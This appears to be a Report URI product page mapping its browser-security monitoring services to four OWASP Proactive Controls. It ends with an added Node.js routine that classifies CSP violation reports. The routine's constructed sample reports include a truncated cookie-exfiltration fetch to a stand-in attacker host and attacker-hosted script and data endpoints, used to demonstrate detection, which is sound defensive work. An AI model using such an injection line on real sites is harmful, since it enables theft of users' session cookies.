OWASP Top 10 Proactive Controls

What are the OWASP Top 10 Proactive Controls?

The OWASP Top 10 Proactive Controls are a set of security techniques that every software developer should know and apply in every project. Unlike a list of things to avoid, the Proactive Controls are positive, actionable guidance — security measures to build in from the start rather than bolt on afterwards.

The current release covers ten controls spanning input validation, cryptography, access control, identity management, component security, and leveraging the security features built into the browser itself. A new version is actively in development — and the ten controls, their numbering, and their scope remain consistent across both the current release and the upcoming one, meaning alignment with the Proactive Controls today carries directly forward.

Who should apply them?

Any organisation building or operating a web application should consider how these controls apply to their environment. The Proactive Controls are designed to be approachable — they are intended as foundational guidance for developers at all levels, not just security specialists.

Applying them consistently across your applications reduces your exposure to the most common and costly web attacks.

How we can help

Report URI directly supports four of the OWASP Top 10 Proactive Controls that relate to browser security, real-time monitoring, and component integrity — in both the current release and the version currently in development:

  • C3: Validate all Input & Handle Exceptions — CSP provides a powerful second line of defence when input validation fails, blocking injected scripts from executing and reporting the attempt.
  • C6: Keep your Components Secure — Script Watch, Data Watch, JavaScript Integrity Monitoring, and our known CVE detection give you continuous visibility over every piece of JavaScript running on your site.
  • C8: Leverage Browser Security Features — Report URI is built around the browser's own security mechanisms. Content Security Policy, Permissions Policy, COEP, COOP, NEL, CSP Integrity, and Integrity-Policy are all supported with full violation reporting.
  • C9: Implement Security Logging and Monitoring — Every violation your browser security headers generate is captured, stored, filtered, and surfaced in real time. Alerts via email, Slack, or webhook ensure you never miss a new threat.

$4,440,000 USD — the average cost of a data breach

- IBM (2025 Cost of a Data Breach Report)

C8 · Leverage Browser Security Features

Content Security Policy

Content Security Policy is the cornerstone of browser-side security. A well-deployed CSP tells the browser exactly which scripts, styles, images, and other resources are permitted to load — blocking everything else before it can execute.

Getting a CSP right is the hard part. Our CSP Wizard collects a complete inventory of every resource used across your entire site in seven days or less. The CSP Builder lets you construct and refine your policy in a visual editor before deployment. And once live, CSP Reporting captures every violation in real time so you can iterate safely without breaking your site.


C8 · Leverage Browser Security Features

Permissions Policy, COEP, COOP & NEL

Beyond CSP, modern browsers provide a suite of additional security mechanisms that reduce your attack surface and improve your visibility over network behaviour. Report URI surfaces violation reports from all of them.

Permissions Policy lets you declare that your site will never use the camera, microphone, geolocation, or other powerful browser features, so even a successful code injection cannot abuse them. Cross-Origin Opener Policy stops other origins from keeping a handle to your window, and Cross-Origin Embedder Policy requires every cross-origin resource you embed to opt in via CORS or a Cross-Origin-Resource-Policy header; together they place your page in a cross-origin isolated context, the precondition for defending against Spectre-style side-channel attacks. Network Error Logging has the browser report DNS failures, connection and TLS errors, and HTTP error responses for its later requests to your origin, with no JavaScript required; because the policy is installed by a successful response, it captures failures on return visits rather than on a user's very first request.

Every violation from each of these headers is reported to Report URI, giving you a complete picture of browser-level security events across your real user population.

C8 · Leverage Browser Security Features

CSP Integrity & Integrity Policy

Subresource Integrity (SRI) lets you cryptographically verify that a resource hasn't been tampered with before the browser executes it. But SRI is opt-in — easy to miss, and invisible when skipped.

The CSP report-sha256 keyword goes further: for every script that loads on your page, the browser reports its SHA-256 hash to Report URI, giving you an audit trail of exactly which code ran, whether or not the script tag carried an integrity attribute. The newer Integrity-Policy header makes SRI mandatory for scripts: any script loaded without an integrity attribute is blocked outright and the violation is reported, turning a silent gap in your defences into a visible, actionable event. Its Report-Only counterpart lets you find those scripts before you enforce, rather than by breaking the page.

C9 · Implement Security Logging and Monitoring

Real-time Violation Reporting

Report URI is a dedicated security logging and monitoring service for the browser layer. Every violation generated by your security headers — CSP, Permissions Policy, COEP, COOP, NEL, Integrity-Policy — is captured the moment it occurs, timestamped, and enriched with the blocked resource URL, document URL, and originating IP.

The OWASP Proactive Controls call for logging that captures malicious activity and feeds detection systems. Our real-time dashboard and powerful filtering tools let you cut through the noise to identify genuine attack patterns, distinguish attacker-injected content from legitimate configuration drift, and build a clear forensic record of security events across your real user population.

The browser reports it. We log it. You see it.

C9 · Implement Security Logging and Monitoring

Alerts & Notifications

Effective security monitoring is only as good as its ability to get the right information to the right people quickly. The OWASP Proactive Controls recognise that detection without notification is not enough.

Report URI sends configurable alerts via email, Slack, and webhooks the moment new violation types are detected. Whether an attacker is testing a new injection vector, a third-party script changes unexpectedly, or a new CSP violation pattern emerges, your team is notified in real time — giving you the window to respond before an incident escalates.

C6 · Keep your Components Secure

Script Watch & Data Watch

Third-party JavaScript is one of the highest-risk components in modern web applications. A compromised CDN, a tampered library, or a malicious dependency can expose your users' data without any visible sign on the page itself.

Script Watch monitors every JavaScript dependency loading across your site and alerts you the moment anything changes — a new script, a modified URL, or an unexpected addition. Because it runs in the browser via CSP, it sees your site exactly as your users do, including authenticated pages, geo-targeted content, and anything a perimeter scanner would miss.

Data Watch monitors every destination your pages are sending data to. If a new exfiltration endpoint appears — the hallmark of a Magecart attack — you'll know about it immediately.


C6 · Keep your Components Secure

JavaScript Integrity Monitoring & CVE Detection

Knowing a script is loading is only the first step — you also need to know whether it contains known vulnerabilities. Our JavaScript Integrity Monitoring identifies every script running across your site by its cryptographic fingerprint and cross-references it against our database of almost 13,000,000 verified fingerprints.

When a loaded script is identified as a library with a known CVE, Report URI surfaces that information directly — so you can see at a glance which of your users are being served vulnerable JavaScript, from which origin, and how widespread the exposure is. Combined with Threat Intelligence enrichment, this gives you a continuous, real-user view of your JavaScript component risk — far beyond what a point-in-time dependency scanner can provide.


C3 · Validate all Input & Handle Exceptions

Defence-in-Depth Against XSS

Input validation is essential — but it is not infallible. C3 of the OWASP Proactive Controls recommends building security in layers, so that a bypass or gap in validation does not automatically result in a successful attack.

Content Security Policy is the most effective browser-side second line of defence against Cross-Site Scripting. A strict script-src policy, one built on per-response nonces or hashes with 'strict-dynamic' rather than a host allow-list, stops injected inline scripts and event handlers from executing even when malicious content reaches the page, so a validation failure becomes a logged CSP violation rather than a successful attack. The violation report tells you what was blocked, the page and line it was injected into, when it happened, and, if the policy includes report-sample, the first characters of the blocked script, so you can find and fix the underlying input handling bug.

CSP does not replace input validation — it ensures that when validation fails, the attacker still loses.
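An added example, not Report URI's code, of the logging pipeline this page describes, covering the real-time violation reporting section (C9), Script Watch and Data Watch (C6) and the defence-in-depth case just above (C3): a Node.js triage routine that parses CSP reports in both wire formats, drops browser-extension noise, and labels each report as an inline injection, a script host missing from your baseline, a data destination missing from your baseline, or a stale policy entry. The baseline hosts and the sample reports are constructed for the example.

```javascript
// Constructed baseline for a hypothetical shop: hosts already known to serve
// scripts and to receive data (in practice, the CSP Wizard inventory).
const BASELINE = {
  scriptHosts: new Set(['shop.example', 'cdn.shop.example', 'js.stripe.example']),
  dataHosts: new Set(['shop.example', 'api.shop.example']),
};

// Legacy reports truncate an extension URL to its bare scheme; Reporting API ones keep it whole.
const EXTENSION_SCHEMES = ['chrome-extension', 'moz-extension', 'safari-web-extension'];

// Both wire formats carry the same facts under different keys: a report-uri POST
// wraps them in "csp-report" with kebab-case names; the Reporting API delivers an
// array of {type, url, body} with camelCase names. Other report types are skipped.
function normalizeCspReports(rawBody) {
  const parsed = JSON.parse(rawBody);
  if (parsed && parsed['csp-report']) {
    const r = parsed['csp-report'];
    return [{
      documentUrl: r['document-uri'] || '',
      blockedUrl: r['blocked-uri'] || '',
      directive: r['effective-directive'] || r['violated-directive'] || '',
      line: r['line-number'] || 0,
      sample: r['script-sample'] || '',
    }];
  }
  if (Array.isArray(parsed)) {
    return parsed
      .filter((e) => e && e.type === 'csp-violation' && e.body)
      .map(({ body }) => ({
        documentUrl: body.documentURL || '',
        blockedUrl: body.blockedURL || '',
        directive: body.effectiveDirective || '',
        line: body.lineNumber || 0,
        sample: body.sample || '',
      }));
  }
  return [];
}

// Host of a blocked URL, or null for CSP keywords such as "inline" and "eval"
// (sent without a scheme) and for anything else that is not a URL.
function hostOf(value) {
  try {
    return new URL(value).host;
  } catch {
    return null;
  }
}

// inline/eval under a script directive is the C3 case: markup reached the page and
// the policy refused to run it. An unknown script host is what Script Watch flags,
// an unknown connect-src/form-action destination what Data Watch flags. A baseline
// host being blocked means the policy, not the site, is out of date.
function classify(report, baseline) {
  const { blockedUrl, directive } = report;
  if (EXTENSION_SCHEMES.includes(blockedUrl.split(':')[0])) return 'extension-noise';
  const host = hostOf(blockedUrl);
  if (directive.startsWith('script-src')) {
    if (blockedUrl === 'inline' || blockedUrl === 'eval') return 'inline-script-injection';
    if (host === null) return 'unclassified';
    return baseline.scriptHosts.has(host) ? 'policy-drift' : 'new-script-host';
  }
  if (directive === 'connect-src' || directive === 'form-action') {
    if (host === null) return 'unclassified';
    return baseline.dataHosts.has(host) ? 'policy-drift' : 'new-data-destination';
  }
  return 'unclassified';
}

// Parse and classify a batch of raw bodies, keeping page, line and sample as evidence.
function triage(rawBodies, baseline = BASELINE) {
  const findings = [];
  for (const raw of rawBodies) {
    for (const report of normalizeCspReports(raw)) {
      const verdict = classify(report, baseline);
      if (verdict !== 'extension-noise') findings.push({ verdict, ...report });
    }
  }
  return findings;
}

// Constructed sample traffic, not real reports: a legacy-format inline injection on
// checkout, then a Reporting API batch with an extension, an unknown script host,
// a new data destination and a baseline host the policy forgot to allow.
const SAMPLE_REPORTS = [
  JSON.stringify({ 'csp-report': {
    'document-uri': 'https://shop.example/checkout', 'effective-directive': 'script-src-elem',
    'blocked-uri': 'inline', 'line-number': 88,
    'script-sample': "fetch('https://collect.attacker.example/?c='+document.coo" } }),
  JSON.stringify([
    { type: 'csp-violation', body: { documentURL: 'https://shop.example/',
      blockedURL: 'chrome-extension://abcdefghijklmnopabcdefghijklmnop/inject.js', effectiveDirective: 'script-src-elem' } },
    { type: 'csp-violation', body: { documentURL: 'https://shop.example/checkout',
      blockedURL: 'https://cdn-static.attacker.example/jquery.min.js', effectiveDirective: 'script-src-elem' } },
    { type: 'csp-violation', body: { documentURL: 'https://shop.example/checkout',
      blockedURL: 'https://collect.attacker.example/c', effectiveDirective: 'connect-src' } },
    { type: 'csp-violation', body: { documentURL: 'https://shop.example/',
      blockedURL: 'https://js.stripe.example/v3/', effectiveDirective: 'script-src-elem' } },
  ]),
];
```

Calling triage(SAMPLE_REPORTS) returns four findings in order: the inline injection with its line number and script sample, the unknown script host, the unknown data destination, and the stale policy entry; the extension report never reaches the findings. The first three are alerts, the last is a policy fix, and keeping them apart is most of what separates a usable CSP feed from noise.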
